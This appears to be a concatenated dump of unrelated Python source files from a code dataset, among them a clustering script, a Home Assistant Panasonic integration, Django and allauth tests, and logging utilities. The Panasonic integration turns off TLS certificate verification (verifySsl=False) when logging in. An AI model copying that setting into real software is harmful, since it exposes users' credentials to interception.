    x = data.drop(skip_cols, axis = 1).dropna()
    gmm = GaussianMixture(n_components=g, covariance_type="full",
        max_iter=1000)
    gmm = gmm.fit(x)
    x_k = file_data[k].drop(skip_cols, axis = 1).dropna()
    gmm_k = GaussianMixture(n_components=g, covariance_type="full",
        max_iter=1000)
    gmm_k = gmm_k.fit(x_k)
    # predict cluster for the k week on both models
    y = gmm.predict(x_k)
    y_k = gmm_k.predict(x_k)
    ari = adjusted_rand_score(y, y_k)
    # return the computed ari and gmm (skipping k)
    return (ari, gmm)

def run_gmm_for_group_count(file_data, group_count, config):
    """Run LOWO over every week for one cluster count; return summary dict.

    The dict holds the best left-out index, its ARI, the ARI total, and
    the corresponding fitted model under "gmm".
    """
    print("Running gmm for group count {}".format(group_count))
    ari = []
    gmm = []
    file_count = len(file_data)
    for k in range(file_count):
        # print("Running gmm by leaving out index {}".format(k))
        (ari_k, gmm_k) = run_gmm_for_g_and_k(file_data, group_count, k,
            config[SKIP_COLS_KEY], config[ONLY_CLOSEST_KEY],
            config[CLOSE_TO_BR_KEY])
        ari.append(ari_k)
        gmm.append(gmm_k)
    ari_max_index = ari.index(max(ari))
    ari_max = ari[ari_max_index]
    gmm_max = gmm[ari_max_index]
    ari_sum = sum(ari)
    result = {
        "lowo_index": ari_max_index,
        "max_ari": ari_max,
        "total_ari": ari_sum,
        "gmm": gmm_max
    }
    return result

def run_gmm_feature_influence(file_data, group_count, skip_lowo, config):
    """Measure each feature's influence by re-running LOWO with it dropped.

    Returns {feature: {"ari": ..., "gmm": ...}}, or None when file_data
    is empty.
    """
    print("Running gmm for group {}, skipping lowo index: {}".format(
        group_count, skip_lowo))
    if len(file_data) == 0:
        return
    global_skip_cols = config[SKIP_COLS_KEY]
    cols = set(file_data[0].columns) - set(global_skip_cols)
    result = {}
    for c in cols:
        print("Skipping feature {}".format(c))
        skip_cols = global_skip_cols + [c]
        ari_c, gmm_c = run_gmm_for_g_and_k(file_data, group_count, skip_lowo,
            skip_cols, config[ONLY_CLOSEST_KEY], config[CLOSE_TO_BR_KEY])
        result[c] = {
            "ari": ari_c,
            "gmm": gmm_c
        }
    return result

def save_results(output_folder, gmms, selected_g, influence_aris, config):
    """Write results.json, config.json and the selected GMM (gmm.joblib).

    Feature influence is reported as (ARI with all features) - (ARI with
    the feature removed), sorted most-influential first.
    """
    groups = sorted(gmms.keys())
    gmm_result = {}
    for g in groups:
        # Strip the (non-serializable) fitted model from the JSON payload.
        gmm_result[g] = {k: gmms[g][k] for k in gmms[g].keys() - {"gmm"}}
    selected_result = { **gmm_result[selected_g] }
    selected_result["group_count"] = selected_g
    selected_result["selection_key"] = config[SELECT_GROUP_KEY]
    if config[ONLY_CLOSEST_KEY] == 1:
        selected_result[ONLY_CLOSEST_KEY] = config[ONLY_CLOSEST_KEY]
    else:
        selected_result[CLOSE_TO_BR_KEY] = config[CLOSE_TO_BR_KEY]
    influence_result = {
        "group_count": selected_g,
        "lowo_index": selected_result["lowo_index"],
        "ari_with_all_features": selected_result["max_ari"]
    }
    feature_result = {}
    influences = {}
    ari_with_all = selected_result["max_ari"]
    for feature in influence_aris:
        ari = influence_aris[feature]["ari"]
        influences[feature] = {
            "influence": ari_with_all - ari,
            "ari": ari
        }
    feature_result = dict(sorted(influences.items(),
        key=lambda item: item[1]["influence"], reverse=True))
    influence_result["feature_data"] = feature_result
    output = {
        "group_data": gmm_result,
        "selected_group": selected_result,
        "feature_influence": influence_result
    }
    output_path = os.path.join(output_folder, "results.json")
    json_data = json.dumps(output, indent=2)
    with open(output_path, "w") as output_file:
        output_file.write(json_data)
    print("Result saved to {}".format(output_path))
    output_path = os.path.join(output_folder, "config.json")
    json_data = json.dumps(config, indent=2)
    with open(output_path, "w") as output_file:
        output_file.write(json_data)
    print("Config saved to {}".format(output_path))
    selected_gmm = gmms[selected_g]["gmm"]
    gmm_path = os.path.join(output_folder, "gmm.joblib")
    joblib.dump(selected_gmm, gmm_path)
    print("GMM model saved to {}".format(gmm_path))

def run_gmm(data_folder, output_folder, config):
    """Load all week*.csv files, sweep cluster counts, and save results.

    The cluster count is chosen by maximizing config["select_group_by"]
    (one of the keys produced by run_gmm_for_group_count).
    """
    stats_files = fnmatch.filter(os.listdir(data_folder), "{}*.csv".format(
        STATS_PREFIX))
    file_data = []
    for sf in stats_files:
        print("Working on file {} ...".format(sf))
        input_file = os.path.join(data_folder, sf)
        stats_data = pd.read_csv(input_file)
        file_data.append(stats_data)
    gmm_groups = {}
    for g in range(config["group_min"], config["group_max"] + 1):
        result = run_gmm_for_group_count(file_data, g, config)
        gmm_groups[g] = result
    group_key = config[SELECT_GROUP_KEY]
    selected_group = max(gmm_groups, key= lambda x: gmm_groups[x][group_key])
    gmm_influence_result = run_gmm_feature_influence(file_data,
        selected_group, gmm_groups[selected_group]["lowo_index"], config)
    save_results(output_folder, gmm_groups, selected_group,
        gmm_influence_result, config)

def parse_args():
    """Parse --data_path, --config_path and --output_path (all required)."""
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "--data_path", type=str,
        help="specifies the folder containing data files",
        required=True)
    parser.add_argument(
        "--config_path", type=str,
        help="specifies the json config file",
        required=True)
    parser.add_argument(
        "--output_path", type=str,
        help="specifies the output folder path",
        required=True)
    return vars(parser.parse_args())

def main():
    """Entry point: resolve paths, load the JSON config, and run the sweep."""
    args = parse_args()
    print("Args: {}".format(args))
    data_path = os.path.abspath(args["data_path"])
    config_path = os.path.abspath(args["config_path"])
    output_path = os.path.abspath(args["output_path"])
    with open(config_path) as f:
        config = json.load(f)
    print("Config: {}".format(config))
    run_gmm(data_path, output_path, config)

# NOTE(review): runs on import as well as when executed as a script —
# consider an `if __name__ == "__main__":` guard.
main()
2.359375
2
module01/classes/class06b.py
LauroHBrant/python-course
2
16765
# Prompt for a line of input and report whether it is purely numeric,
# colouring the prompt/result with codes from the local ``style`` module
# (``blue`` starts the colour, ``none`` resets it).
from style import blue, none

n = input(f'Type {blue}something{none}: ')
print(f'{blue}{n.isnumeric()}')
3.09375
3
custom_components/panasonic_cc/__init__.py
shyne99/panasonic_cc
0
16766
<reponame>shyne99/panasonic_cc<filename>custom_components/panasonic_cc/__init__.py"""Platform for the Panasonic Comfort Cloud."""
from datetime import timedelta
import logging
from typing import Any, Dict

import asyncio
from async_timeout import timeout
import voluptuous as vol

from homeassistant.core import HomeAssistant
from homeassistant.config_entries import SOURCE_IMPORT, ConfigEntry
from homeassistant.const import (
    CONF_USERNAME, CONF_PASSWORD)
from homeassistant.exceptions import ConfigEntryNotReady
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.typing import HomeAssistantType
from homeassistant.helpers import discovery

from .const import TIMEOUT
from .panasonic import PanasonicApiDevice

_LOGGER = logging.getLogger(__name__)

DOMAIN = "panasonic_cc"

CONFIG_SCHEMA = vol.Schema(
    {
        DOMAIN: vol.Schema(
            {
                vol.Required(CONF_USERNAME): cv.string,
                vol.Required(CONF_PASSWORD): cv.string,
            }
        )
    },
    extra=vol.ALLOW_EXTRA,
)

PANASONIC_DEVICES = "panasonic_devices"

COMPONENT_TYPES = ["climate", "sensor", "switch"]


def setup(hass, config):
    """Legacy sync setup hook (no-op; async_setup does the work).

    NOTE(review): returns None rather than True — confirm this hook is
    never used by Home Assistant alongside async_setup.
    """
    pass

async def async_setup(hass: HomeAssistant, config: Dict) -> bool:
    """Set up the Panasonic Comfort Cloud component."""
    hass.data.setdefault(DOMAIN, {})
    return True

async def async_setup_entry(hass: HomeAssistantType, entry: ConfigEntry):
    """Establish connection with Comfort Cloud."""
    import pcomfortcloud
    conf = entry.data
    if PANASONIC_DEVICES not in hass.data:
        hass.data[PANASONIC_DEVICES] = []

    username = conf[CONF_USERNAME]
    password = conf[CONF_PASSWORD]

    api = pcomfortcloud.Session(username, password, verifySsl=False)
    devices = await hass.async_add_executor_job(api.get_devices)
    for device in devices:
        try:
            api_device = PanasonicApiDevice(hass, api, device)
            # Prime the device state once before registering it.
            await api_device.update()
            hass.data[PANASONIC_DEVICES].append(api_device)
        except Exception as e:
            # Best-effort: a single failing device must not block the rest.
            _LOGGER.warning(f"Failed to setup device: {device['name']} ({e})")

    if hass.data[PANASONIC_DEVICES]:
        # Forward the entry to each platform (climate/sensor/switch).
        for component in COMPONENT_TYPES:
            hass.async_create_task(
                hass.config_entries.async_forward_entry_setup(entry, component)
            )
    return True

async def async_unload_entry(hass, config_entry):
    """Unload a config entry."""
    await asyncio.wait(
        [
            hass.config_entries.async_forward_entry_unload(config_entry, component)
            for component in COMPONENT_TYPES
        ]
    )
    hass.data.pop(PANASONIC_DEVICES)
    return True
2.21875
2
django/bossingest/test/test_ingest_manager.py
jhuapl-boss/boss
20
16767
# Copyright 2016 The Johns Hopkins University Applied Physics Laboratory # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import json from unittest.mock import patch, MagicMock from bossingest.ingest_manager import IngestManager from bossingest.models import IngestJob from bossingest.test.setup import SetupTests from bosscore.test.setup_db import SetupTestDB from bosscore.error import ErrorCodes from bosscore.lookup import LookUpKey import bossutils.aws from django.contrib.auth.models import User from ndingest.ndqueue.uploadqueue import UploadQueue from rest_framework.test import APITestCase class BossIngestManagerTest(APITestCase): def setUp(self): """ Initialize the database :return: """ dbsetup = SetupTestDB() self.user = dbsetup.create_super_user(username='testuser', email='<EMAIL>', password='<PASSWORD>') dbsetup.set_user(self.user) self.client.force_login(self.user) dbsetup.insert_ingest_test_data() setup = SetupTests() # Get the config_data for v1 schema config_data = setup.get_ingest_config_data_dict() self.example_config_data = config_data self.volumetric_config_data = setup.get_ingest_config_data_dict_volumetric() # Unit under test. 
self.ingest_mgr = IngestManager() def test_validate_ingest(self): """Method to test validation method""" #Validate schema and config file response = self.ingest_mgr.validate_config_file(self.example_config_data) assert (response is True) #Validate properties response = self.ingest_mgr.validate_properties() assert (response is True) def test_validate_config_file(self): """Method to test validation of a config file""" self.ingest_mgr.validate_config_file(self.example_config_data) assert(self.ingest_mgr.config is not None) assert (self.ingest_mgr.config.config_data is not None) def test_validate_properties(self): """Methos to test validation of properties of the config data""" self.ingest_mgr.validate_config_file(self.example_config_data) self.ingest_mgr.validate_properties() assert (self.ingest_mgr.collection.name == 'my_col_1') assert (self.ingest_mgr.experiment.name == 'my_exp_1') assert (self.ingest_mgr.channel.name == 'my_ch_1') def test_create_ingest_job(self): """Method to test creation of a ingest job from a config_data dict""" self.ingest_mgr.validate_config_file(self.example_config_data) self.ingest_mgr.validate_properties() self.ingest_mgr.owner = self.user.pk job = self.ingest_mgr.create_ingest_job() assert (job.id is not None) assert (job.ingest_type == IngestJob.TILE_INGEST) assert (job.tile_size_x == 512) assert (job.tile_size_y == 512) assert (job.tile_size_z == 1) assert (job.tile_size_t == 1) def test_create_ingest_job_volumetric(self): self.ingest_mgr.validate_config_file(self.volumetric_config_data) self.ingest_mgr.validate_properties() self.ingest_mgr.owner = self.user.pk job = self.ingest_mgr.create_ingest_job() assert (job.id is not None) assert (job.ingest_type == IngestJob.VOLUMETRIC_INGEST) assert (job.tile_size_x == 1024) assert (job.tile_size_y == 1024) assert (job.tile_size_z == 64) assert (job.tile_size_t == 1) def test_generate_upload_queue_args_tile_job(self): """Ensure ingest_type set properly""" 
self.ingest_mgr.validate_config_file(self.example_config_data) self.ingest_mgr.validate_properties() self.ingest_mgr.owner = self.user.pk job = self.ingest_mgr.create_ingest_job() actual = self.ingest_mgr._generate_upload_queue_args(job) assert actual['ingest_type'] == IngestJob.TILE_INGEST assert actual['z_chunk_size'] == 16 def test_generate_upload_queue_args_volumetric_job(self): """Ensure ingest_type set properly""" self.ingest_mgr.validate_config_file(self.volumetric_config_data) self.ingest_mgr.validate_properties() self.ingest_mgr.owner = self.user.pk job = self.ingest_mgr.create_ingest_job() actual = self.ingest_mgr._generate_upload_queue_args(job) assert actual['ingest_type'] == IngestJob.VOLUMETRIC_INGEST assert actual['z_chunk_size'] == 64 assert actual['ingest_queue'] is None def test_tile_bucket_name(self): """ Test get tile bucket name""" tile_bucket_name = self.ingest_mgr.get_tile_bucket() assert(tile_bucket_name is not None) def test_get_resource_data(self): """Run the method and ensure keys set""" self.ingest_mgr.validate_config_file(self.example_config_data) self.ingest_mgr.validate_properties() self.ingest_mgr.owner = self.user.pk job = self.ingest_mgr.create_ingest_job() actual = self.ingest_mgr.get_resource_data(job.id) self.assertIn('boss_key', actual) self.assertIn('lookup_key', actual) self.assertIn('channel', actual) self.assertIn('experiment', actual) self.assertIn('coord_frame', actual)
1.867188
2
sanic_devtools/log.py
yunstanford/sanic-devtools
12
16768
<reponame>yunstanford/sanic-devtools import json import logging import logging.config import platform import re import traceback from io import StringIO import pygments from devtools import pformat from devtools.ansi import isatty, sformat from pygments.formatters import Terminal256Formatter from pygments.lexers import Python3TracebackLexer rs_dft_logger = logging.getLogger('sdev.server.dft') rs_aux_logger = logging.getLogger('sdev.server.aux') tools_logger = logging.getLogger('sdev.tools') main_logger = logging.getLogger('sdev.main') LOG_FORMATS = { logging.DEBUG: sformat.dim, logging.INFO: sformat.green, logging.WARN: sformat.yellow, } pyg_lexer = Python3TracebackLexer() pyg_formatter = Terminal256Formatter(style='vim') split_log = re.compile(r'^(\[.*?\])') class HighlightStreamHandler(logging.StreamHandler): def setFormatter(self, fmt): self.formatter = fmt self.formatter.stream_is_tty = isatty(self.stream) and platform.system().lower() != 'windows' class DefaultFormatter(logging.Formatter): def __init__(self, fmt=None, datefmt=None, style='%'): super().__init__(fmt, datefmt, style) self.stream_is_tty = False def format(self, record): msg = super().format(record) if not self.stream_is_tty: return msg m = split_log.match(msg) log_color = LOG_FORMATS.get(record.levelno, sformat.red) if m: time = sformat(m.groups()[0], sformat.magenta) return time + sformat(msg[m.end():], log_color) else: return sformat(msg, log_color) class AccessFormatter(logging.Formatter): """ Used to log sanic_access and sanic_server """ def __init__(self, fmt=None, datefmt=None, style='%'): super().__init__(fmt, datefmt, style) self.stream_is_tty = False def formatMessage(self, record): msg = super().formatMessage(record) if msg[0] != '{': return msg # json from AccessLogger obj = json.loads(msg) if self.stream_is_tty: # in future we can do clever things about colouring the message based on status code msg = '{} {} {}'.format( sformat(obj['time'], sformat.magenta), sformat(obj['prefix'], 
sformat.blue), sformat(obj['msg'], sformat.dim if obj['dim'] else sformat.reset), ) else: msg = '{time} {prefix} {msg}'.format(**obj) details = getattr(record, 'details', None) if details: msg = 'details: {}\n{}'.format(pformat(details, highlight=self.stream_is_tty), msg) return msg def formatException(self, ei): sio = StringIO() traceback.print_exception(*ei, file=sio) stack = sio.getvalue() sio.close() if self.stream_is_tty and pyg_lexer: return pygments.highlight(stack, lexer=pyg_lexer, formatter=pyg_formatter).rstrip('\n') else: return stack def log_config(verbose: bool) -> dict: """ Setup default config. for dictConfig. :param verbose: level: DEBUG if True, INFO if False :return: dict suitable for ``logging.config.dictConfig`` """ log_level = 'DEBUG' if verbose else 'INFO' return { 'version': 1, 'disable_existing_loggers': False, 'formatters': { 'default': { 'format': '[%(asctime)s] %(message)s', 'datefmt': '%H:%M:%S', 'class': 'sanic_devtools.log.DefaultFormatter', }, 'no_ts': { 'format': '%(message)s', 'class': 'sanic_devtools.log.DefaultFormatter', }, 'sanic': { 'format': '%(message)s', 'class': 'sanic_devtools.log.AccessFormatter', }, }, 'handlers': { 'default': { 'level': log_level, 'class': 'sanic_devtools.log.HighlightStreamHandler', 'formatter': 'default' }, 'no_ts': { 'level': log_level, 'class': 'sanic_devtools.log.HighlightStreamHandler', 'formatter': 'no_ts' }, 'sanic_access': { 'level': log_level, 'class': 'sanic_devtools.log.HighlightStreamHandler', 'formatter': 'sanic' }, 'sanic_server': { 'class': 'sanic_devtools.log.HighlightStreamHandler', 'formatter': 'sanic' }, }, 'loggers': { rs_dft_logger.name: { 'handlers': ['default'], 'level': log_level, }, rs_aux_logger.name: { 'handlers': ['default'], 'level': log_level, }, tools_logger.name: { 'handlers': ['default'], 'level': log_level, }, main_logger.name: { 'handlers': ['no_ts'], 'level': log_level, }, 'sanic.access': { 'handlers': ['sanic_access'], 'level': log_level, 'propagate': False, }, 
'sanic.server': { 'handlers': ['sanic_server'], 'level': log_level, }, }, } def setup_logging(verbose): config = log_config(verbose) logging.config.dictConfig(config)
1.929688
2
rest_fhir/mixins/conditional_read.py
weynelucas/django-rest-fhir
2
16769
import calendar from typing import Union import dateutil.parser from rest_framework import status from rest_framework.response import Response from django.utils.cache import get_conditional_response from django.utils.http import http_date from ..models import Resource, ResourceVersion FhirResource = Union[Resource, ResourceVersion] class ConditionalReadMixin: def conditional_read(self, request, *args, **kwargs): instance = self.get_object() serializer = self.get_serializer(instance) res_data = serializer.data # Test If-Modified-Since and If-None-Match preconditions # https://www.hl7.org/fhir/http.html#cread etag, last_modified = self.get_conditional_args(res_data) response = get_conditional_response(request, etag, last_modified) if response is not None: return response # Set revelant header on the response if request method is safe headers = self.get_conditional_headers(res_data) return Response( data=res_data, status=status.HTTP_200_OK, headers=headers, ) def etag_func(self, data) -> str: return 'W/"%s"' % data['meta']['versionId'] def last_modified_func(self, data) -> str: dt = dateutil.parser.parse(data['meta']['lastUpdated']) return calendar.timegm(dt.utctimetuple()) def get_conditional_args(self, data: dict): etag = self.etag_func(data) last_modified = self.last_modified_func(data) return ( etag, last_modified, ) def get_conditional_headers(self, data): etag, last_modified = self.get_conditional_args(data) headers = dict() if etag: headers['ETag'] = etag if last_modified: headers['Last-Modified'] = http_date(last_modified) return headers
2.1875
2
code_week27_1026_111/sort_colors.py
dylanlee101/leetcode
0
16770
<filename>code_week27_1026_111/sort_colors.py ''' 给定一个包含红色、白色和蓝色,一共 n 个元素的数组,原地对它们进行排序,使得相同颜色的元素相邻,并按照红色、白色、蓝色顺序排列。 此题中,我们使用整数 0、 1 和 2 分别表示红色、白色和蓝色。 注意: 不能使用代码库中的排序函数来解决这道题。 示例: 输入: [2,0,2,1,1,0] 输出: [0,0,1,1,2,2] 进阶: 一个直观的解决方案是使用计数排序的两趟扫描算法。 首先,迭代计算出0、1 和 2 元素的个数,然后按照0、1、2的排序,重写当前数组。 你能想出一个仅使用常数空间的一趟扫描算法吗? 来源:力扣(LeetCode) 链接:https://leetcode-cn.com/problems/sort-colors ''' class Solution: def sortColors(self, nums: List[int]) -> None: """ Do not return anything, modify nums in-place instead. """ n = len(nums) ptr = 0 for i in range(n): if nums[i] == 0: nums[i],nums[ptr] = nums[ptr],nums[i] ptr += 1 for i in range(ptr,n): if nums[i] == 1: nums[i],nums[ptr] = nums[ptr],nums[i] ptr +=1
3.8125
4
solutions/lowest_common_ancestor_deepest_leaves/__main__.py
ansonmiu0214/dsa-worked-solutions
0
16771
<reponame>ansonmiu0214/dsa-worked-solutions<filename>solutions/lowest_common_ancestor_deepest_leaves/__main__.py from .solution import lcaDeepestLeaves from ..utils import TreeNode print('Enter tree, e.g. [2,3,1,3,1,null,1]:', end=' ') nodes = [int(node) if node != 'null' else None for node in input().strip().split(',')] root = TreeNode.fromList(nodes) lowestCommonAncestor = lcaDeepestLeaves(root) print(f'The lowest common ancestor is: {lowestCommonAncestor.toList()}')
3.078125
3
code/python3/index_values_with_geo.py
jaylett/xapian-docsprint
47
16772
#!/usr/bin/env python import json from support import parse_states import sys import xapian def index(datapath, dbpath): # Create or open the database we're going to be writing to. db = xapian.WritableDatabase(dbpath, xapian.DB_CREATE_OR_OPEN) # Set up a TermGenerator that we'll use in indexing. termgenerator = xapian.TermGenerator() termgenerator.set_stemmer(xapian.Stem("en")) for fields in parse_states(datapath): # 'fields' is a dictionary mapping from field name to value. # Pick out the fields we're going to index. name = fields.get('name', u'') description = fields.get('description', u'') motto = fields.get('motto', u'') admitted = fields.get('admitted', None) population = fields.get('population', None) order = fields.get('order', u'') # We make a document and tell the term generator to use this. doc = xapian.Document() termgenerator.set_document(doc) # index each field with a suitable prefix termgenerator.index_text(name, 1, 'S') termgenerator.index_text(description, 1, 'XD') termgenerator.index_text(motto, 1, 'XM') # Index fields without prefixes for general search. termgenerator.index_text(name) termgenerator.increase_termpos() termgenerator.index_text(description) termgenerator.increase_termpos() termgenerator.index_text(motto) # Add document values. if admitted is not None: doc.add_value(1, xapian.sortable_serialise(int(admitted[:4]))) doc.add_value(2, admitted) # YYYYMMDD if population is not None: doc.add_value(3, xapian.sortable_serialise(int(population))) ### Start of example code. midlat = fields['midlat'] midlon = fields['midlon'] if midlat and midlon: doc.add_value(4, "%f,%f" % (float(midlat), float(midlon))) ### End of example code. # Store all the fields for display purposes. doc.set_data(json.dumps(fields)) # We use the order to ensure each object ends up in the # database only once no matter how many times we run the # indexer. 
idterm = u"Q" + order doc.add_boolean_term(idterm) db.replace_document(idterm, doc) if len(sys.argv) != 3: print("Usage: %s DATAPATH DBPATH" % sys.argv[0]) sys.exit(1) index(datapath = sys.argv[1], dbpath = sys.argv[2])
2.609375
3
logger.py
drewstone/dynamic-governanceq
0
16773
<filename>logger.py import constants def init(mode, gov, agents): if mode == constants.DEBUG_LOGGING or mode == constants.LOG_INIT: print("Agents = {}".format( list(map(lambda agent: agent.capacity, agents)))) print("Starting param: {}".format(gov.param)) def round(mode, round, gov, throughput): if mode == constants.DEBUG_LOGGING or mode == constants.LOG_ROUND: print("\nRound {} | OLD_P = {}, NEW_P = {}, TPS = {}, RULE = {}\n" .format(round, gov.prev_param, gov.param, throughput, gov.decision_type)) def dropout(mode, active, inactive): if mode == constants.DEBUG_LOGGING or mode == constants.LOG_DROPOUT: print("Active agents: {}".format( list(map(lambda a: a.capacity, active)))) print("Inactive agents: {}".format( list(map(lambda a: a.capacity, inactive)))) def payments(mode, payments): if mode == constants.DEBUG_LOGGING or mode == constants.LOG_PAYMENTS: if payments: payment_logs = list(map(lambda p: "Param {} => {}" .format(p[1], p[0]), payments)) print("\t\t\tPayments\n" + "\n".join(payment_logs))
2.78125
3
test/core/bad_ssl/gen_build_yaml.py
Akrog/grpc
3
16774
<filename>test/core/bad_ssl/gen_build_yaml.py #!/usr/bin/env python2.7 # Copyright 2015 gRPC authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Generates the appropriate build.json data for all the end2end tests.""" import collections import yaml TestOptions = collections.namedtuple('TestOptions', 'flaky cpu_cost') default_test_options = TestOptions(False, 1.0) # maps test names to options BAD_CLIENT_TESTS = { 'cert': default_test_options._replace(cpu_cost=0.1), # Disabling this test because it does not link correctly as written # 'alpn': default_test_options._replace(cpu_cost=0.1), } def main(): json = { '#': 'generated with test/bad_ssl/gen_build_json.py', 'libs': [{ 'name': 'bad_ssl_test_server', 'build': 'private', 'language': 'c', 'src': ['test/core/bad_ssl/server_common.cc'], 'headers': ['test/core/bad_ssl/server_common.h'], 'vs_proj_dir': 'test', 'platforms': ['linux', 'posix', 'mac'], 'deps': ['grpc_test_util', 'grpc', 'gpr'] }], 'targets': [{ 'name': 'bad_ssl_%s_server' % t, 'build': 'test', 'language': 'c', 'run': False, 'src': ['test/core/bad_ssl/servers/%s.cc' % t], 'vs_proj_dir': 'test/bad_ssl', 'platforms': ['linux', 'posix', 'mac'], 'deps': ['bad_ssl_test_server', 'grpc_test_util', 'grpc', 'gpr'] } for t in sorted(BAD_CLIENT_TESTS.keys())] + [{ 'name': 'bad_ssl_%s_test' % t, 'cpu_cost': BAD_CLIENT_TESTS[t].cpu_cost, 'build': 'test', 'language': 'c', 'src': ['test/core/bad_ssl/bad_ssl_test.cc'], 'vs_proj_dir': 'test', 'platforms': ['linux', 'posix', 'mac'], 
'deps': ['grpc_test_util', 'grpc', 'gpr'] } for t in sorted(BAD_CLIENT_TESTS.keys())] } print yaml.dump(json) if __name__ == '__main__': main()
2.09375
2
tests/test_providers.py
thejoeejoee/django-allauth-cas
0
16775
<filename>tests/test_providers.py # -*- coding: utf-8 -*- from six.moves.urllib.parse import urlencode from django.contrib import messages from django.contrib.messages.api import get_messages from django.contrib.messages.middleware import MessageMiddleware from django.contrib.messages.storage.base import Message from django.contrib.sessions.middleware import SessionMiddleware from django.test import RequestFactory, TestCase, override_settings from allauth.socialaccount.providers import registry from allauth_cas.views import AuthAction from .example.provider import ExampleCASProvider class CASProviderTests(TestCase): def setUp(self): self.request = self._get_request() self.provider = ExampleCASProvider(self.request) def _get_request(self): request = RequestFactory().get('/test/') SessionMiddleware(lambda: None).process_request(request) MessageMiddleware(lambda: None).process_request(request) return request def test_register(self): """ Example CAS provider is registered as social account provider. 
""" self.assertIsInstance(registry.by_id('theid'), ExampleCASProvider) def test_get_login_url(self): url = self.provider.get_login_url(self.request) self.assertEqual('/accounts/theid/login/', url) url_with_qs = self.provider.get_login_url( self.request, next='/path?quéry=string&two=whoam%C3%AF', ) self.assertEqual( url_with_qs, '/accounts/theid/login/?next=%2Fpath%3Fqu%C3%A9ry%3Dstring%26two%3' 'Dwhoam%25C3%25AF' ) def test_get_callback_url(self): url = self.provider.get_callback_url(self.request) self.assertEqual('/accounts/theid/login/callback/', url) url_with_qs = self.provider.get_callback_url( self.request, next='/path?quéry=string&two=whoam%C3%AF', ) self.assertEqual( url_with_qs, '/accounts/theid/login/callback/?next=%2Fpath%3Fqu%C3%A9ry%3Dstrin' 'g%26two%3Dwhoam%25C3%25AF' ) def test_get_logout_url(self): url = self.provider.get_logout_url(self.request) self.assertEqual('/accounts/theid/logout/', url) url_with_qs = self.provider.get_logout_url( self.request, next='/path?quéry=string&two=whoam%C3%AF', ) self.assertEqual( url_with_qs, '/accounts/theid/logout/?next=%2Fpath%3Fqu%C3%A9ry%3Dstring%26two%' '3Dwhoam%25C3%25AF' ) @override_settings(SOCIALACCOUNT_PROVIDERS={ 'theid': { 'AUTH_PARAMS': {'key': 'value'}, }, }) def test_get_auth_params(self): action = AuthAction.AUTHENTICATE auth_params = self.provider.get_auth_params(self.request, action) self.assertDictEqual(auth_params, { 'key': 'value', }) @override_settings(SOCIALACCOUNT_PROVIDERS={ 'theid': { 'AUTH_PARAMS': {'key': 'value'}, }, }) def test_get_auth_params_with_dynamic(self): factory = RequestFactory() request = factory.get( '/test/?auth_params=next%3Dtwo%253Dwhoam%2525C3%2525AF%2526qu%2525' 'C3%2525A9ry%253Dstring' ) request.session = {} action = AuthAction.AUTHENTICATE auth_params = self.provider.get_auth_params(request, action) self.assertDictEqual(auth_params, { 'key': 'value', 'next': 'two=whoam%C3%AF&qu%C3%A9ry=string', }) def test_add_message_suggest_caslogout(self): expected_msg_base_str = ( 
"To logout of The Provider, please close your browser, or visit " "this <a href=\"/accounts/theid/logout/?{}\">link</a>." ) # Defaults. req1 = self.request self.provider.add_message_suggest_caslogout(req1) expected_msg1 = Message( messages.INFO, expected_msg_base_str.format(urlencode({'next': '/test/'})), ) self.assertIn(expected_msg1, get_messages(req1)) # Custom arguments. req2 = self._get_request() self.provider.add_message_suggest_caslogout( req2, next_page='/redir/', level=messages.WARNING) expected_msg2 = Message( messages.WARNING, expected_msg_base_str.format(urlencode({'next': '/redir/'})), ) self.assertIn(expected_msg2, get_messages(req2)) def test_message_suggest_caslogout_on_logout(self): self.assertFalse( self.provider.message_suggest_caslogout_on_logout(self.request)) with override_settings(SOCIALACCOUNT_PROVIDERS={ 'theid': {'MESSAGE_SUGGEST_CASLOGOUT_ON_LOGOUT': True}, }): self.assertTrue( self.provider .message_suggest_caslogout_on_logout(self.request) ) @override_settings(SOCIALACCOUNT_PROVIDERS={ 'theid': { 'MESSAGE_SUGGEST_CASLOGOUT_ON_LOGOUT_LEVEL': messages.WARNING, }, }) def test_message_suggest_caslogout_on_logout_level(self): self.assertEqual(messages.WARNING, ( self.provider .message_suggest_caslogout_on_logout_level(self.request) )) def test_extract_uid(self): response = 'useRName', {} uid = self.provider.extract_uid(response) self.assertEqual('useRName', uid) def test_extract_common_fields(self): response = 'useRName', {} common_fields = self.provider.extract_common_fields(response) self.assertDictEqual(common_fields, { 'username': 'useRName', 'first_name': None, 'last_name': None, 'name': None, 'email': None, }) def test_extract_common_fields_with_extra(self): response = 'useRName', {'username': 'user', 'email': '<EMAIL>'} common_fields = self.provider.extract_common_fields(response) self.assertDictEqual(common_fields, { 'username': 'user', 'first_name': None, 'last_name': None, 'name': None, 'email': '<EMAIL>', }) def 
test_extract_extra_data(self): response = 'useRName', {'user_attr': 'thevalue', 'another': 'value'} extra_data = self.provider.extract_extra_data(response) self.assertDictEqual(extra_data, { 'user_attr': 'thevalue', 'another': 'value', 'uid': 'useRName', })
2.078125
2
infoblox_netmri/api/remote/models/device_password_log_remote.py
IngmarVG-IB/infoblox-netmri
0
16776
